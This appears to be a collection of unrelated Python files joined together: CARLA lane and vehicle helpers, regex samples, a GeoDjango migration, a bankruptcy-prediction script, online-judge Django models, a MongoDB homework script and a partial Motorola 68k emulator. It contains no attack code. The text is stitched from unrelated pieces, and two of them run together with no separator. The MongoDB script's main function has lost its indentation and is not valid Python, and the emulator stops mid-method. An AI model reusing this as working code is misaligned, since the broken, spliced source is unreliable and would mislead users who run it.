        if(actor == None or transform == None):
            print("Input is None. Please Check")
            return None
        else:
            actor_to_world_transform = actor.get_transform()
            R_actor_to_world = get_matrix(actor_to_world_transform)
            R_world_to_actor = np.linalg.inv(R_actor_to_world)
            transform_coords = np.zeros((4, 1))
            transform_coords[0] = transform.location.x
            transform_coords[1] = transform.location.y
            transform_coords[2] = transform.location.z
            transform_coords[3] = 1
            transform_position_as_seen_from_actor = np.dot(R_world_to_actor, transform_coords)
            return transform_position_as_seen_from_actor

    def get_pedestrian_information(self, ego_vehicle=None):
        """Return all walker actors on the same road as the ego vehicle."""
        pedestrian_list = []
        ego_vehicle_location = ego_vehicle.get_location()
        nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
        # Get current road and lane IDs
        current_road_ID = nearest_waypoint.road_id
        for actor in self.world.get_actors().filter('walker.*'):
            actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
            if(actor_nearest_waypoint.road_id == current_road_ID):
                pedestrian_list.append(actor)
        return pedestrian_list

    def get_next_waypoints(self, last_waypoint, ego_speed, rev=False, k=100):
        """Walk up to *k* waypoints forward (or backward when rev=True)
        from last_waypoint, preferring STRAIGHT at junctions."""
        if(last_waypoint == None):
            return []
        sampling_radius = 1#ego_speed * 1 / 3.6
        full_waypoints = []
        for i in range(k):
            if(rev == False):
                next_waypoints = last_waypoint.next(sampling_radius)
            else:
                next_waypoints = last_waypoint.previous(sampling_radius)
            if len(next_waypoints) == 0:
                break
            elif len(next_waypoints) == 1:
                # only one option available ==> lanefollowing
                next_waypoint = next_waypoints[0]
                road_option = RoadOption.LANEFOLLOW
            else:
                # random choice between the possible options
                road_options_list = self._retrieve_options(
                    next_waypoints, last_waypoint)
                road_option = random.choice(road_options_list)
                # Prefer going straight when that option exists.
                if RoadOption.STRAIGHT in road_options_list:
                    next_waypoint = next_waypoints[road_options_list.index(RoadOption.STRAIGHT)]
                else:
                    next_waypoint = next_waypoints[road_options_list.index(road_option)]
            full_waypoints.append(next_waypoint)
            # curr_waypoint = next_waypoints[-1]
            last_waypoint = next_waypoint
        return full_waypoints

    def get_state_information_new(self, ego_vehicle=None, original_lane_ID=None,):
        """Lane waypoints plus surrounding vehicles, classified by walking
        the current/left/right lanes forward from the ego position.

        Returns (current_lane_waypoints, left_lane_waypoints,
        right_lane_waypoints, front_vehicle, rear_vehicle,
        actors_in_current_lane, actors_in_left_lane, actors_in_right_lane).
        """
        if(ego_vehicle==None):
            print("No ego vehicle specified..")
            return None
        else:
            # Get ego vehicle location and nearest waypoint for reference.
            ego_vehicle_location = ego_vehicle.get_location()
            nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
            # Speed magnitude in km/h.
            ego_speed = np.sqrt(ego_vehicle.get_velocity().x**2 + ego_vehicle.get_velocity().y**2 + ego_vehicle.get_velocity().z**2) * 3.6
            current_lane_waypoints = self.get_next_waypoints(nearest_waypoint, ego_speed, k=300)[::-1]
            left_lane_waypoints = self.get_next_waypoints(nearest_waypoint.get_left_lane(), ego_speed, k=300)[::-1] #+
            right_lane_waypoints = self.get_next_waypoints(nearest_waypoint.get_right_lane(), ego_speed, k=300)[::-1] #+
            # self.draw_waypoints(current_lane_waypoints, life_time=5)
            # self.draw_waypoints(left_lane_waypoints, life_time=5, color=True)
            left_lane_ids = list(set([wp.lane_id for wp in left_lane_waypoints]))
            current_lane_ids = list(set([wp.lane_id for wp in current_lane_waypoints]))
            right_lane_ids = list(set([wp.lane_id for wp in right_lane_waypoints]))
            # Containers for actors in current, left and right lanes
            actors_in_current_lane = []
            actors_in_left_lane = []
            actors_in_right_lane = []
            # Containers for leading and rear vehicle in current lane
            front_vehicle = None
            rear_vehicle = None
            closest_distance_front = 10000000000 #TODO Change this to more formal value
            closest_distance_rear = -10000000000 #TODO Change this to more formal value
            for actor in self.world.get_actors().filter('vehicle.*'):
                # For all actors that are not ego vehicle
                if(actor.id != ego_vehicle.id):
                    actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
                    if(actor_nearest_waypoint.lane_id in left_lane_ids):
                        actors_in_left_lane.append(actor)
                    elif(actor_nearest_waypoint.lane_id in right_lane_ids):
                        actors_in_right_lane.append(actor)
                    else:
                        # NOTE(review): every vehicle that is not in the
                        # left/right lane ids falls in here — including
                        # vehicles on entirely different roads. Confirm.
                        actors_in_current_lane.append(actor)
                        curr_actor_location_in_ego_vehicle_frame = self.convert_global_transform_to_actor_frame(actor=ego_vehicle, transform=actor.get_transform())
                        # Positive x in the ego frame = ahead of the ego.
                        if(curr_actor_location_in_ego_vehicle_frame[0][0] > 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] < closest_distance_front):
                            front_vehicle = actor
                            closest_distance_front = curr_actor_location_in_ego_vehicle_frame[0][0]
                        elif(curr_actor_location_in_ego_vehicle_frame[0][0] < 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] > closest_distance_rear):
                            rear_vehicle = actor
                            closest_distance_rear = curr_actor_location_in_ego_vehicle_frame[0][0]
            return current_lane_waypoints, left_lane_waypoints, right_lane_waypoints, front_vehicle, rear_vehicle, actors_in_current_lane, actors_in_left_lane, actors_in_right_lane

    def get_state_information(self, ego_vehicle=None, original_lane_ID=None):
        """Older variant of get_state_information_new that classifies
        actors by road/lane IDs from the pre-generated waypoint list."""
        # Check for valid inputs
        if(ego_vehicle==None):
            print("No ego vehicle specified..")
            return None
        else:
            # Get ego vehicle location and nearest waypoint for reference.
            ego_vehicle_location = ego_vehicle.get_location()
            nearest_waypoint = self.world_map.get_waypoint(ego_vehicle_location, project_to_road=True)
            # Get current road and lane IDs
            current_road_ID = nearest_waypoint.road_id
            #print("Spawn Road ID Inside Handler:", current_road_ID)
            current_lane_ID = nearest_waypoint.lane_id
            if(original_lane_ID is not None):
                current_lane_ID = original_lane_ID
            if(original_lane_ID is not None):
                # Lane IDs are signed; neighbours differ by +/-1 depending
                # on the sign of the current lane.
                if(original_lane_ID < 0):
                    left_lane_ID = current_lane_ID+1
                    right_lane_ID = current_lane_ID-1
                else:
                    left_lane_ID = current_lane_ID-1
                    right_lane_ID = current_lane_ID+1
            # Get IDs of left and right lanes
            else:
                left_lane_ID = nearest_waypoint.get_left_lane().lane_id
                right_lane_ID = nearest_waypoint.get_right_lane().lane_id
            # Finding waypoints in current, left and right lanes
            current_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=current_lane_ID)
            left_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=left_lane_ID)
            right_lane_waypoints = self.filter_waypoints(self.all_waypoints, road_id=current_road_ID, lane_id=right_lane_ID)
            # Containers for leading and rear vehicle in current lane
            front_vehicle = None
            rear_vehicle = None
            closest_distance_front = 10000000000 #TODO Change this to more formal value
            closest_distance_rear = -10000000000 #TODO Change this to more formal value
            # Containers for actors in current, left and right lanes
            actors_in_current_lane = []
            actors_in_left_lane = []
            actors_in_right_lane = []
            # Fill containers defined above
            for actor in self.world.get_actors().filter('vehicle.*'):
                # For all actors that are not ego vehicle
                if(actor.id != ego_vehicle.id):
                    # Find nearest waypoint on the map
                    actor_nearest_waypoint = self.world_map.get_waypoint(actor.get_location(), project_to_road=True)
                    # If actor is on the same road as the ego vehicle
                    if(actor_nearest_waypoint.road_id == current_road_ID):
                        #print(actor_nearest_waypoint.road_id, actor_nearest_waypoint.lane_id, "OLA")
                        # If actor is on the same lane as the ego vehicle: Add to relevant container, and find if it's the leading or trailing vehicle
                        if(actor_nearest_waypoint.lane_id == current_lane_ID):
                            actors_in_current_lane.append(actor)
                            curr_actor_location_in_ego_vehicle_frame = self.convert_global_transform_to_actor_frame(actor=ego_vehicle, transform=actor.get_transform())
                            # Positive x in the ego frame = ahead of the ego.
                            if(curr_actor_location_in_ego_vehicle_frame[0][0] > 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] < closest_distance_front):
                                front_vehicle = actor
                                closest_distance_front = curr_actor_location_in_ego_vehicle_frame[0][0]
                            elif(curr_actor_location_in_ego_vehicle_frame[0][0] < 0.0 and curr_actor_location_in_ego_vehicle_frame[0][0] > closest_distance_rear):
                                rear_vehicle = actor
                                closest_distance_rear = curr_actor_location_in_ego_vehicle_frame[0][0]
                        # Add to relevant container
                        elif(actor_nearest_waypoint.lane_id == left_lane_ID):
                            actors_in_left_lane.append(actor)
                        # Add to relevant container
                        elif(actor_nearest_waypoint.lane_id == right_lane_ID):
                            actors_in_right_lane.append(actor)
            return current_lane_waypoints, left_lane_waypoints, right_lane_waypoints, front_vehicle, rear_vehicle, actors_in_current_lane, actors_in_left_lane, actors_in_right_lane
|
import re

# Match URLs ending in .com or .cn.
# BUG FIX: the original pattern ended in the character class "[.com|.cn]",
# which matches any SINGLE character out of ". c o m n |" rather than the
# literal suffixes; a non-capturing alternation expresses the real intent.
# The space after "://" is deliberate: the sample string below contains
# "http:// www...".  Raw strings avoid invalid-escape warnings.
pattern = r"[a-zA-Z]+:// [^\s]*(?:\.com|\.cn)"
string = "<a href='http:// www.baidu.com'>百度首页</a>"
print(re.search(pattern, string))

# Match a phone number: 4-digit area code + 7 digits, or 3-digit + 8 digits.
pattern = r"\d{4}-\d{7}|\d{3}-\d{8}"
string = "021-6728263653682382265236"
print(re.search(pattern, string))

# Match an e-mail address.
pattern = r"\w+([.+-]\w+)*@\w+([.-]\w+)*\.\w+([.-]\w+)*"
string = "<a href='http:// www.baidu.com'>百度首页</a><br><a href='mailto:c-e+o@iqi-anyue.com.cn'>电子邮件地址</a>"
print(re.search(pattern, string))
|
# Generated by Django 3.0.8 on 2020-07-10 10:50
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial GeoDjango migration.

    Creates five spatial models — Drainase (drainage lines), Jalan (roads),
    Jembatan (bridges), Kab_Sidrap (administrative boundaries) and
    Kesehatan (health facilities).  All geometry columns use SRID 4326
    (WGS84).  Generated by Django 3.0.8; field order is schema-significant,
    so the declarations below are left exactly as generated.
    """

    # First migration of the app: no prior migration state exists.
    initial = True

    dependencies = [
    ]

    operations = [
        # Drainage network segments (LineString geometry).
        migrations.CreateModel(
            name='Drainase',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('lcode', models.CharField(max_length=50)),
                ('shape_leng', models.FloatField()),
                ('rpru', models.CharField(max_length=100)),
                ('kemiringan', models.IntegerField()),
                ('panjang_m', models.IntegerField()),
                ('kdlmn_m', models.IntegerField()),
                ('kondisi', models.CharField(max_length=50)),
                ('tahun', models.IntegerField()),
                ('anggaran', models.BigIntegerField()),
                ('kontraktor', models.CharField(max_length=50)),
                ('surv_time', models.DateField()),
                ('geom', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
            ],
            options={
                'verbose_name_plural': 'Drainase',
            },
        ),
        # Road segments (LineString geometry).
        migrations.CreateModel(
            name='Jalan',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('remark', models.CharField(max_length=250)),
                ('shape_leng', models.FloatField()),
                ('surveyor', models.CharField(max_length=250)),
                ('surv_time', models.DateField()),
                ('number', models.IntegerField()),
                ('name', models.CharField(max_length=250)),
                ('length_km', models.BigIntegerField()),
                ('width_m', models.BigIntegerField()),
                ('tpp', models.CharField(max_length=250)),
                ('tpu', models.CharField(max_length=250)),
                ('lhr', models.IntegerField()),
                ('status', models.CharField(max_length=100)),
                ('surf_type', models.CharField(max_length=100)),
                ('kondisi', models.CharField(max_length=100)),
                ('hambatan', models.CharField(max_length=100)),
                ('tahun', models.IntegerField()),
                ('anggaran', models.BigIntegerField()),
                ('geom', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
            ],
            options={
                'verbose_name_plural': 'Jalan',
            },
        ),
        # Bridges (Point geometry).
        migrations.CreateModel(
            name='Jembatan',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('surveyor', models.CharField(max_length=100)),
                ('surv_date', models.DateField()),
                ('nama', models.CharField(max_length=100)),
                ('pal_km', models.IntegerField()),
                ('panjang_m', models.BigIntegerField()),
                ('lebar_m', models.BigIntegerField()),
                ('bentang', models.IntegerField()),
                ('tipe_jem', models.CharField(max_length=100)),
                ('penyebrang', models.CharField(max_length=100)),
                ('bhn_konstr', models.CharField(max_length=50)),
                ('kondisi', models.CharField(max_length=100)),
                ('tahun', models.IntegerField()),
                ('anggaran', models.BigIntegerField()),
                ('geom', django.contrib.gis.db.models.fields.PointField(srid=4326)),
            ],
            options={
                'verbose_name_plural': 'Jembatan',
            },
        ),
        # Administrative boundary polygons for Kabupaten Sidrap.
        migrations.CreateModel(
            name='Kab_Sidrap',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('provinsi', models.CharField(max_length=40)),
                ('kecamatan', models.CharField(max_length=40)),
                ('desa', models.CharField(max_length=40)),
                ('sumber', models.CharField(max_length=50)),
                ('kode2010', models.CharField(max_length=10)),
                ('provno', models.CharField(max_length=2)),
                ('kabkotno', models.CharField(max_length=2)),
                ('kecno', models.CharField(max_length=3)),
                ('desano', models.CharField(max_length=3)),
                ('kabkot', models.CharField(max_length=50)),
                ('geom', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
            ],
            options={
                'verbose_name_plural': 'Batas Administrasi',
            },
        ),
        # Health facilities (Point geometry).
        migrations.CreateModel(
            name='Kesehatan',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('namobj', models.CharField(max_length=250)),
                ('remark', models.CharField(max_length=250)),
                ('alamat', models.CharField(max_length=250)),
                ('jml_dktr', models.IntegerField()),
                ('jml_prwt', models.IntegerField()),
                ('jml_pasien', models.IntegerField()),
                ('jml_ruang', models.IntegerField()),
                ('fasilitas', models.CharField(max_length=250)),
                ('kond_bgnn', models.CharField(max_length=100)),
                ('tahun', models.IntegerField()),
                ('anggaran', models.BigIntegerField()),
                ('sumb_dana', models.CharField(max_length=50)),
                ('kontraktor', models.CharField(max_length=100)),
                ('surv_time', models.DateField()),
                ('geom', django.contrib.gis.db.models.fields.PointField(srid=4326)),
            ],
            options={
                'verbose_name_plural': 'Fasilitas Kesehatan',
            },
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 14 13:17:40 2020
@author: 60342
"""
# In[1]: Import several important libs.
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from patsy import dmatrices
from sklearn import metrics
from sklearn.metrics import confusion_matrix
get_ipython().magic('matplotlib inline')
# In[2]: Function definition used for data process and model training.
'''Function of splitting the data to features and the labels'''
def preprocessdata(raw_data):
    """Split a raw dataset into (labels, features).

    The 'class' column is converted to a float numpy array of labels;
    every remaining column is returned unchanged as the feature frame.
    The input DataFrame is not mutated.
    """
    labels_bankruptcy_flag = np.array(raw_data['class'], dtype=float)
    bankruptcy_factors = raw_data.drop(['class'], axis=1)
    return labels_bankruptcy_flag, bankruptcy_factors
'''Function of calculating performance indexes'''
def performance_indexes(true_labels, predicted_labels, predicted_proba=None):
    """Print classification metrics and plot the confusion-matrix heatmap.

    Reports accuracy, (optionally) ROC-AUC, the confusion matrix and the
    per-class classification report, then shows the confusion matrix as a
    seaborn heatmap.

    :param true_labels: ground-truth labels
    :param predicted_labels: labels predicted by a model
    :param predicted_proba: optional (n_samples, 2) class-probability
        array; column 1 is used for ROC-AUC when supplied
    :return: the confusion matrix
    """
    # BUG FIX: the default used to be a mutable list literal ([]), a classic
    # shared-across-calls hazard; None keeps the same "no proba" behaviour.
    print (metrics.accuracy_score(true_labels,predicted_labels))
    if predicted_proba is not None and len(predicted_proba):
        # AUC needs the probability of the positive (bankrupt) class.
        print (metrics.roc_auc_score(true_labels, predicted_proba[:, 1]))
    print (metrics.confusion_matrix(true_labels,predicted_labels))
    print (metrics.classification_report(true_labels,predicted_labels))
    cal_confusion_mat = confusion_matrix(true_labels,predicted_labels)
    plt.figure(figsize=(10,6))
    sns.heatmap(cal_confusion_mat,
                xticklabels=['Non Bankrupt', 'Bankrupt'],
                yticklabels=['Non Bankrupt', 'Bankrupt'])
    plt.show()
    return cal_confusion_mat
'''Function of training bankruptcy model'''
def train_bankruptcy_model(training_data,select_model):
    """Train one bankruptcy classifier and report its training metrics.

    :param training_data: DataFrame with the feature columns plus a
        'class' label column
    :param select_model: one of 'LR', 'Dtree', 'MLP', 'SVM'
    :return: (fitted model, list of VIF values — one per feature column)
    :raises ValueError: if *select_model* is not a recognised model name
    """
    '''2_1.split the training data to features and the labels'''
    train_label_bankruptcy_flag,training_bankruptcy_factors=preprocessdata(training_data)
    print (training_bankruptcy_factors.columns)
    '''2_2.build the selected machine learning model'''
    if select_model=='LR':
        # Logistic Regression
        from sklearn.linear_model import LogisticRegression
        model = LogisticRegression()
    elif select_model=='Dtree':
        # Decision Tree
        from sklearn.tree import DecisionTreeClassifier
        model = DecisionTreeClassifier()
    elif select_model=='MLP':
        # MLP Neural Network
        from sklearn.neural_network import MLPClassifier
        model = MLPClassifier(hidden_layer_sizes=(12,12,12))
    elif select_model=='SVM':
        # Support Vector Machine; probability=True enables predict_proba
        from sklearn.svm import SVC
        model = SVC(probability = True)
    else:
        # BUG FIX: an unknown name used to fall through and crash later
        # with an opaque NameError on 'model' -- fail fast instead.
        raise ValueError('Unknown model name: %r' % (select_model,))
    '''2_3.training model'''
    model = model.fit(training_bankruptcy_factors, train_label_bankruptcy_flag)
    # check the accuracy on the training set
    acc=model.score(training_bankruptcy_factors, train_label_bankruptcy_flag)
    print('Evaluation of ',select_model,' model using the training data: ',acc)
    ############################## analysis and results ###################################
    '''2_4.predict labels of training data using model'''
    predicted_train_labels = model.predict(training_bankruptcy_factors)
    '''2_5.probabilities of classification by model'''
    proba_training = model.predict_proba(training_bankruptcy_factors)
    '''2_6.calculate score, confusion matrix and other performance indexes'''
    train_confusion_mat=performance_indexes(train_label_bankruptcy_flag, predicted_train_labels, proba_training)
    '''2_7.calculate VIF'''
    # Variance inflation factor per feature: a multicollinearity check.
    from statsmodels.stats.outliers_influence import variance_inflation_factor
    vif = [variance_inflation_factor(training_bankruptcy_factors.values, i) for i in range(training_bankruptcy_factors.shape[1])]
    return model,vif
'''Function of predicting bankruptcy results on the testing data'''
def predict_bankruptcy_result(test_label_bankruptcy_flag,test_bankruptcy_factors,select_model,bankruptcy_model):
    """Evaluate a fitted model on the held-out test set.

    Prints the predictions, test accuracy, observed bankruptcy rate, class
    probabilities and the standard performance indexes, then returns the
    predicted labels (as a pandas Series) with the probability matrix.
    """
    ############################## analysis and results ###################################
    '''2_1.predict labels of testing data using model'''
    labels_out = bankruptcy_model.predict(test_bankruptcy_factors)
    print (labels_out)
    acc = bankruptcy_model.score(test_bankruptcy_factors, test_label_bankruptcy_flag)
    print('Evaluation of ',select_model,' model on testing bankruptcy data: ',acc)
    print('Percentage of bankruptcy on testing bankruptcy data:',test_label_bankruptcy_flag.mean())
    '''2_2.probabilities of classification by model'''
    proba_testing = bankruptcy_model.predict_proba(test_bankruptcy_factors)
    print (proba_testing)
    '''2_3.calculate score, confusion matrix and other performance indexes'''
    performance_indexes(test_label_bankruptcy_flag, labels_out, proba_testing)
    return pd.Series(labels_out), proba_testing
# In[3]: Classification main function with training and testing.
'''load data and preprocess'''
from scipy.io import arff
# Which of the yearly Polish-bankruptcy datasets to load (ARFF format).
select_data="1year.arff"
All_bankruptcy_data,meta=arff.loadarff(select_data)
All_bankruptcy_data=pd.DataFrame(All_bankruptcy_data)
# The ARFF loader yields the 'class' column as bytes (b'0' / b'1');
# decode each value and cast to int.
All_bankruptcy_data['class']=All_bankruptcy_data['class'].apply(lambda row_x: int(bytes.decode(row_x)))
# Drop two attribute columns and zero-fill missing values.
# NOTE(review): presumably Attr37/Attr21 were removed because of missing
# data or collinearity -- confirm against the feature-selection analysis.
All_bankruptcy_data = All_bankruptcy_data.drop(columns=['Attr37', 'Attr21'])
All_bankruptcy_data.fillna(0, inplace=True)
'''3_1.select the training data'''
# 50/50 random train/test split, seeded for reproducibility.
training_bankruptcy_data = All_bankruptcy_data.sample(frac=0.5, random_state=0)
'''3_2.plot the bar graph reflecting the count of two labels -- bankruptcy or not'''
plt.figure(figsize=(10,6))
sns.countplot(x='class',data = training_bankruptcy_data)
plt.show()
'''3_3.load the testing data'''
# Test set = every row NOT sampled into the training set.
testing_bankruptcy_data=All_bankruptcy_data.loc[~All_bankruptcy_data.index.isin(training_bankruptcy_data.index)]
testing_bankruptcy_data.head()
'''3_4.plot the bar graph reflecting the count of two labels -- bankruptcy or not'''
plt.figure(figsize=(10,6))
sns.countplot(x='class',data = testing_bankruptcy_data)
plt.show()
'''3_5.split the testing data to features and the labels'''
test_label_bankruptcy_flag,test_bankruptcy_factors=preprocessdata(testing_bankruptcy_data)
# y_test, X_test = dmatrices('class ~ trans_cf_td + trans_ca_cl + trans_re_ta + trans_ni_ta + trans_td_ta + trans_s_ta + trans_wc_ta + trans_wc_s + trans_c_cl + trans_cl_e + trans_in_s + trans_mve_td',
#                            test_data, return_type="dataframe")
model_name_all=['LR','Dtree','MLP','SVM']
composite_predlabels = pd.DataFrame()
#select_model='LR'
# Train each model in turn and collect its test-set predictions,
# one column per model, for the composite vote below.
for select_model in model_name_all:
    print('------Using ',select_model,' model for training------')
    '''3_5.training the bankruptcy model'''
    bankruptcy_model,bankruptcy_VIF=train_bankruptcy_model(training_bankruptcy_data,select_model)
    '''3_6.testing the bankruptcy testing data'''
    predicted_test_labels,proba_testing=predict_bankruptcy_result(test_label_bankruptcy_flag,test_bankruptcy_factors,select_model,bankruptcy_model)
    '''3_7.generate composite predictive labels'''
    composite_predlabels[select_model] = predicted_test_labels
#print (composite_predlabels)
# Majority vote over LR / MLP / Dtree (SVM is deliberately excluded here).
composite_predicted_bankrupt = composite_predlabels[['LR','MLP','Dtree']].mode(axis=1,numeric_only=True)
#print(composite_predicted_bankrupt)
print (metrics.accuracy_score(test_label_bankruptcy_flag, composite_predicted_bankrupt))
'''3_8.calculate score, confusion matrix and other performance indexes'''
final_test_confusion_mat=performance_indexes(test_label_bankruptcy_flag, composite_predicted_bankrupt)
|
from __future__ import unicode_literals
import os
import zipfile
import time
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from django.db.models.signals import post_save
from django.dispatch import receiver
from judge import config
def get_image_path(instance, filename):
    """Build the FileField upload path: '<instance id>/<filename>'."""
    folder = str(instance.id)
    return os.path.join(folder, filename)
class Problem(models.Model):
    """An online-judge problem: statement, limits, attached data file and
    running submission counters."""
    # Problem number is assigned externally, hence an explicit integer PK.
    id = models.IntegerField(primary_key=True)
    title = models.CharField(max_length=30)
    content = models.TextField()
    # Test-data archive; stored under '<problem id>/<original filename>'.
    file = models.FileField(upload_to=get_image_path)
    memory_limit = models.IntegerField(null=True)
    time_limit = models.IntegerField()
    upload_date = models.DateField()
    # Counters updated as submissions are judged.
    submit_times = models.IntegerField(default=0)
    accept_times = models.IntegerField(default=0)
    # Statement sections: I/O format descriptions and sample I/O.
    input_request = models.TextField()
    output_request = models.TextField()
    input_sample = models.TextField()
    output_sample = models.TextField()
    source = models.CharField(max_length=30)
    level = models.CharField(max_length=30)
    classify = models.CharField(max_length=30)
@receiver(post_save, sender=Problem, dispatch_uid="unzip")
def unzip(sender, instance, **kwargs):
    """post_save hook: extract every .zip archive found in the problem's
    data directory ('data_dir/<problem id>') in place, then delete the
    archive files.

    Silently does nothing when the directory does not exist yet.
    """
    # BUG FIX: the original wrapped this join in try/except-pass; join
    # cannot fail, and had the except fired, 'data_dir' would have been
    # unbound and the listdir below would raise NameError.
    data_dir = os.path.join('data_dir', '%s' % instance.id)
    # A freshly created problem may not have a data directory yet.
    if not os.path.isdir(data_dir):
        return
    for file_name in os.listdir(data_dir):
        if os.path.splitext(file_name)[1] == '.zip':
            zip_path = os.path.join(data_dir, file_name)
            # Context manager guarantees the handle is closed even if
            # extraction fails part-way; extractall replaces the manual
            # per-member loop.
            with zipfile.ZipFile(zip_path, 'r') as file_zip:
                file_zip.extractall(data_dir)
            os.remove(zip_path)
class Submit(models.Model):
    """One submission of code against a Problem by a User, with its judge
    verdict and resource usage."""
    # NOTE(review): ForeignKey without on_delete only works on Django < 2.0;
    # confirm the project's Django version before upgrading.
    problem_id = models.ForeignKey(Problem)
    user_id = models.ForeignKey(User)
    # Stamped automatically on every save.
    submit_time = models.TimeField(auto_now=True)
    language = models.CharField(max_length=10)
    # Resource usage reported by the judge.
    take_time = models.IntegerField(default=0)
    take_memory = models.IntegerField(default=0)
    result = models.CharField(max_length=10)
    code = models.TextField()
    codeLength = models.CharField(max_length=10)
    status = models.IntegerField(default=0)
#!/usr/bin/python
# -*- coding: UTF8 -*-
import pymongo
import sys
# Homework 3.1 · Course M101P
#
# Write a program in the language of your choice that will remove
# the lowest homework score for each student. Since there is a single
# document for each student containing an array of scores, you will
# need to update the scores array and remove the homework.
#
# Note: when run twice, all homework scores will have been removed.
# Connect to the local MongoDB instance and bind the 'students'
# collection of the 'school' database used by the functions below.
connection = pymongo.MongoClient("mongodb://localhost")
db = connection.school
students = db.students
def remove_lowest_homework_score(scores):
    """Return a copy of *scores* without the lowest homework score.

    Every homework entry whose score equals the minimum homework score is
    dropped (ties are all removed); non-homework entries are kept as-is.
    Raises ValueError when *scores* contains no homework entry at all.
    """
    lowest = min(entry[u"score"] for entry in scores
                 if entry[u"type"] == u"homework")
    return [entry for entry in scores
            if entry[u"type"] != u"homework" or entry[u"score"] != lowest]
def update_scores( coll, doc_id, new_scores):
    """Overwrite the 'scores' array of the document identified by doc_id."""
    # NOTE(review): collection.update() is removed in modern pymongo
    # (use update_one), and the bare except swallows every failure after
    # merely printing it -- kept as-is: this is Python-2 course sample code.
    try:
        coll.update( { "_id": doc_id}, { "$set": { "scores": new_scores }})
    except:
        print "Unexpected error while updating:", sys.exc_info()[ 0]
def main( argv):
try:
# All students having a score of type "homework" in their scores array
cursor = students.find( { 'scores.type': 'homework' })
except:
print "Unexpected error while finding:", sys.exc_info()[ 0]
for doc in cursor:
id = doc[ "_id"]
scores = doc[ "scores"]
updated_scores = remove_lowest_homework_score( scores)
update_scores( students, id, updated_scores)
print "updated doc %s:\n scores: %s\nnew scores: %s" % ( id, scores, updated_scores)
if __name__ == "__main__":
main(sys.argv[1:]) |
"""
Motorola 68k chip definition
"""
from .memory import Memory
from ..core.enum.register import Register, FULL_SIZE_REGISTERS, ALL_ADDRESS_REGISTERS
from ..core.enum.condition_status_code import ConditionStatusCode
from ..core.models.list_file import ListFile
import typing
import binascii
from ..core.models.memory_value import MemoryValue
from ..core.enum.op_size import OpSize
# Total addressable memory: the 68k exposes a 24-bit address bus.
MAX_MEMORY_LOCATION = 16777216 # 2^24
class M68K:
    """Software model of a Motorola 68000 CPU.

    Owns the memory image, the register file (data/address registers,
    PC and CCR as MemoryValue objects) and a simple fetch/decode/execute
    stepping loop driven by the opcode modules.
    """

    def __init__(self):
        """
        Constructor
        """
        self.memory = Memory()

        # has the simulation been halted using SIMHALT or .halt()
        self.halted = False

        # should the clock automatically cycle?
        self.clock_auto_cycle = True
        self._clock_cycles = 0

        # todo add events for each clock cycle
        # this is necessary for implementing breakpoints
        # and watches for value changes

        # set up the registers to their default values
        self.registers = {}
        self.__init_registers()

    def __init_registers(self):
        """
        Set the registers to their default values
        :return:
        """
        # loop through all of the full size registers which are just 32 bits / 4 bytes long
        for register in FULL_SIZE_REGISTERS:
            self.registers[register] = MemoryValue(OpSize.LONG)

        # set up all of the odd registers (in this case, just the Condition Code Register)
        # which just uses 5 bits out of the lowermost byte (do we want to allocate it an entire word instead?)
        self.registers[Register.ConditionCodeRegister] = MemoryValue(OpSize.BYTE)

        # Easy68k initializes the stack pointer (A7) to 0x1000000 by default, so do the same
        self.set_register(Register.A7, MemoryValue(OpSize.LONG, unsigned_int=0x1000000))

    def get_register(self, register: Register) -> MemoryValue:
        """
        Gets the entire value of a register
        :param register:
        :return:
        """
        return self.registers[register]

    def set_register(self, register: Register, val: MemoryValue):
        """
        Sets the value of a register using a 32-bit int
        :param register:
        :param val:
        :return:
        """
        # if the register is the CCR, use that method to handle setting it
        # because of its different size
        if register == Register.ConditionCodeRegister:
            self._set_condition_code_register_value(val)
            return

        # if the register is an address register that is limited to fit in the bounds of memory
        if register in ALL_ADDRESS_REGISTERS:
            self.set_address_register_value(register, val)
            return

        # now for all other registers
        # ensure that the value is within bounds
        # actual negative numbers will need to be converted into 32-bit numbers
        assert 0 <= val.get_value_unsigned() <= 0xFFFFFFFF, 'The value for registers must fit into 4 bytes!'

        # set the value
        self.registers[register] = val

    def _set_condition_code_register_value(self, val: MemoryValue):
        """
        Sets the value for the condition code register
        :param val:
        :return:
        """
        # ensure that the value is within bounds
        # since the CCR is just a single byte
        assert 0 <= val.get_value_unsigned() <= 0xFF, 'The value for the CCR must fit in a single byte!'

        # now set the value
        self.registers[Register.ConditionCodeRegister] = val

    def get_program_counter_value(self) -> int:
        """
        Gets the 32-bit unsigned integer value for the program counter value
        :return:
        """
        mv = self.get_register(Register.ProgramCounter)
        ret = mv.get_value_unsigned()
        return ret

    def set_address_register_value(self, reg: Register, new_value: MemoryValue):
        """
        Sets the value of an address register, so the PC or A0-A7
        :param reg:
        :param new_value:
        :return:
        """
        # no longer assert that the address register value is a pointer to memory
        # since address register direct modes don't consider the amount of memory
        assert reg in ALL_ADDRESS_REGISTERS, 'The register given is not an address register!'
        # now set the value of the register
        self.registers[reg].set_value_unsigned_int(new_value.get_value_unsigned())

    def set_program_counter_value(self, new_value: int):
        """
        Sets the value of the program counter
